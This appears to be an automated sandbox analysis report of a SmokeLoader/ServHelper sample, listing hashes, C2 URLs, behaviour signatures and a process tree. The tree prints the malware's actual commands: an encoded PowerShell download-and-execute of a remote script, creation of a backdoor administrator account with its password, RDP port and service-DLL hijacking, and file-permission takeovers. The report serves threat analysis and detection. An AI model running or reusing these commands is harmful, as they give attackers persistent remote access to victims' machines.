Analysis

  • max time kernel
    151s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    18-10-2021 11:30

General

  • Target

    363fece1255b4dd7f688225dbc090e8b.exe

  • Size

    262KB

  • MD5

    363fece1255b4dd7f688225dbc090e8b

  • SHA1

    624e505f3b828e0f27bd8c2d82687def04ea63d9

  • SHA256

    477af70aacb75d845210fbb00fe37d4c6bd22422ed62dc859ebdf1dc93433c3a

  • SHA512

    70db537ae80612b88db8dfcb33d61a1deecd97555c2d150a9e2fdbaa4a6e89ca2600afbc07eaa6fd32342f044b602951d8bacaebbea7a4efe3c6fafb5054ccab

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

smokeloader

Version

2020

C2

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

rc4.i32
rc4.i32

Signatures

  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 9 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 4 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\363fece1255b4dd7f688225dbc090e8b.exe
    "C:\Users\Admin\AppData\Local\Temp\363fece1255b4dd7f688225dbc090e8b.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:1776
  • C:\Users\Admin\AppData\Local\Temp\4BFE.exe
    C:\Users\Admin\AppData\Local\Temp\4BFE.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:556
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1796
      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tkffumk6.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1328
        • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6EBB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6EBA.tmp"
          4⤵
            PID:1324
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1620
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1816
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1148
        • C:\Windows\system32\takeown.exe
          "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:996
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1736
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:1648
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1740
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1752
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:860
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1992
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1540
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:892
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:1724
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:960
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1416
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:1776
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:652
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                    PID:1684
                    • C:\Windows\system32\net.exe
                      net start rdpdr
                      5⤵
                        PID:1628
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 start rdpdr
                          6⤵
                            PID:1256
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                      3⤵
                        PID:608
                        • C:\Windows\system32\cmd.exe
                          cmd /c net start TermService
                          4⤵
                            PID:740
                            • C:\Windows\system32\net.exe
                              net start TermService
                              5⤵
                                PID:1400
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 start TermService
                                  6⤵
                                    PID:1948
                            • C:\Windows\system32\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                              3⤵
                                PID:1400
                              • C:\Windows\system32\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                3⤵
                                  PID:836
                            • C:\Windows\System32\cmd.exe
                              cmd /C net.exe user WgaUtilAcc 000000 /del
                              1⤵
                                PID:2016
                                • C:\Windows\system32\net.exe
                                  net.exe user WgaUtilAcc 000000 /del
                                  2⤵
                                    PID:1580
                                    • C:\Windows\system32\net1.exe
                                      C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
                                      3⤵
                                        PID:2012
                                  • C:\Windows\System32\cmd.exe
                                    cmd /C net.exe user WgaUtilAcc 2lh7U4tU /add
                                    1⤵
                                      PID:2024
                                      • C:\Windows\system32\net.exe
                                        net.exe user WgaUtilAcc 2lh7U4tU /add
                                        2⤵
                                          PID:1388
                                          • C:\Windows\system32\net1.exe
                                            C:\Windows\system32\net1 user WgaUtilAcc 2lh7U4tU /add
                                            3⤵
                                              PID:960
                                        • C:\Windows\System32\cmd.exe
                                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                          1⤵
                                            PID:1604
                                            • C:\Windows\system32\net.exe
                                              net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                              2⤵
                                                PID:616
                                                • C:\Windows\system32\net1.exe
                                                  C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                  3⤵
                                                    PID:532
                                              • C:\Windows\System32\cmd.exe
                                                cmd /C net.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD
                                                1⤵
                                                  PID:1052
                                                  • C:\Windows\system32\net.exe
                                                    net.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD
                                                    2⤵
                                                      PID:2020
                                                      • C:\Windows\system32\net1.exe
                                                        C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD
                                                        3⤵
                                                          PID:1428
                                                    • C:\Windows\System32\cmd.exe
                                                      cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                      1⤵
                                                        PID:2016
                                                        • C:\Windows\system32\net.exe
                                                          net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                          2⤵
                                                            PID:796
                                                            • C:\Windows\system32\net1.exe
                                                              C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                              3⤵
                                                                PID:1492
                                                          • C:\Windows\System32\cmd.exe
                                                            cmd /C net.exe user WgaUtilAcc 2lh7U4tU
                                                            1⤵
                                                              PID:2024
                                                              • C:\Windows\system32\net.exe
                                                                net.exe user WgaUtilAcc 2lh7U4tU
                                                                2⤵
                                                                  PID:544
                                                                  • C:\Windows\system32\net1.exe
                                                                    C:\Windows\system32\net1 user WgaUtilAcc 2lh7U4tU
                                                                    3⤵
                                                                      PID:1864
                                                                • C:\Windows\System32\cmd.exe
                                                                  cmd.exe /C wmic path win32_VideoController get name
                                                                  1⤵
                                                                    PID:1552
                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                      wmic path win32_VideoController get name
                                                                      2⤵
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1272
                                                                  • C:\Windows\System32\cmd.exe
                                                                    cmd.exe /C wmic CPU get NAME
                                                                    1⤵
                                                                      PID:1276
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        wmic CPU get NAME
                                                                        2⤵
                                                                        • Modifies data under HKEY_USERS
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:316
                                                                    • C:\Windows\System32\cmd.exe
                                                                      cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                      1⤵
                                                                        PID:616
                                                                        • C:\Windows\system32\cmd.exe
                                                                          cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                          2⤵
                                                                            PID:544
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                              3⤵
                                                                              • Blocklisted process makes network request
                                                                              • Drops file in Windows directory
                                                                              • Modifies data under HKEY_USERS
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1864

                                                                        Network

                                                                        MITRE ATT&CK Enterprise v6

                                                                        Replay Monitor

                                                                        Loading Replay Monitor...

                                                                        Downloads

                                                                        • memory/556-63-0x00000000415B0000-0x00000000419AF000-memory.dmp

                                                                          Filesize

                                                                          4.0MB

                                                                        • memory/556-68-0x0000000041137000-0x0000000041138000-memory.dmp

                                                                          Filesize

                                                                          4KB

                                                                        • memory/556-65-0x0000000041132000-0x0000000041134000-memory.dmp

                                                                          Filesize

                                                                          8KB

                                                                        • memory/556-67-0x0000000041136000-0x0000000041137000-memory.dmp

                                                                          Filesize

                                                                          4KB

                                                                        • memory/556-66-0x0000000041134000-0x0000000041136000-memory.dmp

                                                                          Filesize

                                                                          8KB

                                                                        • memory/1148-112-0x0000000002570000-0x0000000002572000-memory.dmp

                                                                          Filesize

                                                                          8KB

                                                                        • memory/1148-114-0x0000000002572000-0x0000000002574000-memory.dmp

                                                                          Filesize

                                                                          8KB

                                                                        • memory/1148-118-0x000000000257C000-0x000000000259B000-memory.dmp

                                                                          Filesize

                                                                          124KB

                                                                        • memory/1148-117-0x0000000002577000-0x0000000002578000-memory.dmp

                                                                          Filesize

                                                                          4KB

                                                                        • memory/1148-116-0x000000001B950000-0x000000001BC4F000-memory.dmp

                                                                          Filesize

                                                                          3.0MB

                                                                        • memory/1148-113-0x000007FEEB650000-0x000007FEEC1AD000-memory.dmp

                                                                          Filesize

                                                                          11.4MB

                                                                        • memory/1148-115-0x0000000002574000-0x0000000002577000-memory.dmp

                                                                          Filesize

                                                                          12KB

                                                                        • memory/1204-58-0x0000000001D90000-0x0000000001DA6000-memory.dmp

                                                                          Filesize

                                                                          88KB

                                                                        • memory/1328-86-0x00000000022E0000-0x00000000022E2000-memory.dmp

                                                                          Filesize

                                                                          8KB

                                                                        • memory/1620-97-0x00000000025E7000-0x00000000025E8000-memory.dmp

                                                                          Filesize

                                                                          4KB

                                                                        • memory/1620-96-0x00000000025E4000-0x00000000025E7000-memory.dmp

                                                                          Filesize

                                                                          12KB

                                                                        • memory/1620-92-0x000000001B800000-0x000000001BAFF000-memory.dmp

                                                                          Filesize

                                                                          3.0MB

                                                                        • memory/1620-94-0x00000000025EC000-0x000000000260B000-memory.dmp

                                                                          Filesize

                                                                          124KB

                                                                        • memory/1620-95-0x00000000025E2000-0x00000000025E4000-memory.dmp

                                                                          Filesize

                                                                          8KB

                                                                        • memory/1620-91-0x000007FEEB650000-0x000007FEEC1AD000-memory.dmp

                                                                          Filesize

                                                                          11.4MB

                                                                        • memory/1620-93-0x00000000025E0000-0x00000000025E2000-memory.dmp

                                                                          Filesize

                                                                          8KB

                                                                        • memory/1776-54-0x000000000091B000-0x000000000092C000-memory.dmp

                                                                          Filesize

                                                                          68KB

                                                                        • memory/1776-56-0x0000000076851000-0x0000000076853000-memory.dmp

                                                                          Filesize

                                                                          8KB

                                                                        • memory/1776-55-0x0000000000220000-0x0000000000229000-memory.dmp

                                                                          Filesize

                                                                          36KB

                                                                        • memory/1776-57-0x0000000000400000-0x0000000000772000-memory.dmp

                                                                          Filesize

                                                                          3.4MB

                                                                        • memory/1796-85-0x000000000260B000-0x000000000262A000-memory.dmp

                                                                          Filesize

                                                                          124KB

                                                                        • memory/1796-70-0x000007FEFC351000-0x000007FEFC353000-memory.dmp

                                                                          Filesize

                                                                          8KB

                                                                        • memory/1796-87-0x000000000262D000-0x000000000262E000-memory.dmp

                                                                          Filesize

                                                                          4KB

                                                                        • memory/1796-74-0x0000000002604000-0x0000000002607000-memory.dmp

                                                                          Filesize

                                                                          12KB

                                                                        • memory/1796-73-0x0000000002602000-0x0000000002604000-memory.dmp

                                                                          Filesize

                                                                          8KB

                                                                        • memory/1796-72-0x0000000002600000-0x0000000002602000-memory.dmp

                                                                          Filesize

                                                                          8KB

                                                                        • memory/1796-71-0x000007FEEB650000-0x000007FEEC1AD000-memory.dmp

                                                                          Filesize

                                                                          11.4MB

                                                                        • memory/1816-105-0x0000000002802000-0x0000000002804000-memory.dmp

                                                                          Filesize

                                                                          8KB

                                                                        • memory/1816-102-0x0000000002800000-0x0000000002802000-memory.dmp

                                                                          Filesize

                                                                          8KB

                                                                        • memory/1816-106-0x000000000280C000-0x000000000282B000-memory.dmp

                                                                          Filesize

                                                                          124KB

                                                                        • memory/1816-104-0x000000001B8B0000-0x000000001BBAF000-memory.dmp

                                                                          Filesize

                                                                          3.0MB

                                                                        • memory/1816-107-0x0000000002804000-0x0000000002807000-memory.dmp

                                                                          Filesize

                                                                          12KB

                                                                        • memory/1816-101-0x000007FEEB650000-0x000007FEEC1AD000-memory.dmp

                                                                          Filesize

                                                                          11.4MB

                                                                        • memory/1816-103-0x0000000002807000-0x0000000002808000-memory.dmp

                                                                          Filesize

                                                                          4KB

                                                                        • memory/1864-162-0x000007FEEB650000-0x000007FEEC1AD000-memory.dmp

                                                                          Filesize

                                                                          11.4MB

                                                                        • memory/1864-164-0x000000000118B000-0x00000000011AA000-memory.dmp

                                                                          Filesize

                                                                          124KB

                                                                        • memory/1864-165-0x0000000001182000-0x0000000001184000-memory.dmp

                                                                          Filesize

                                                                          8KB

                                                                        • memory/1864-166-0x0000000001184000-0x0000000001187000-memory.dmp

                                                                          Filesize

                                                                          12KB

                                                                        • memory/1864-163-0x0000000001180000-0x0000000001182000-memory.dmp

                                                                          Filesize

                                                                          8KB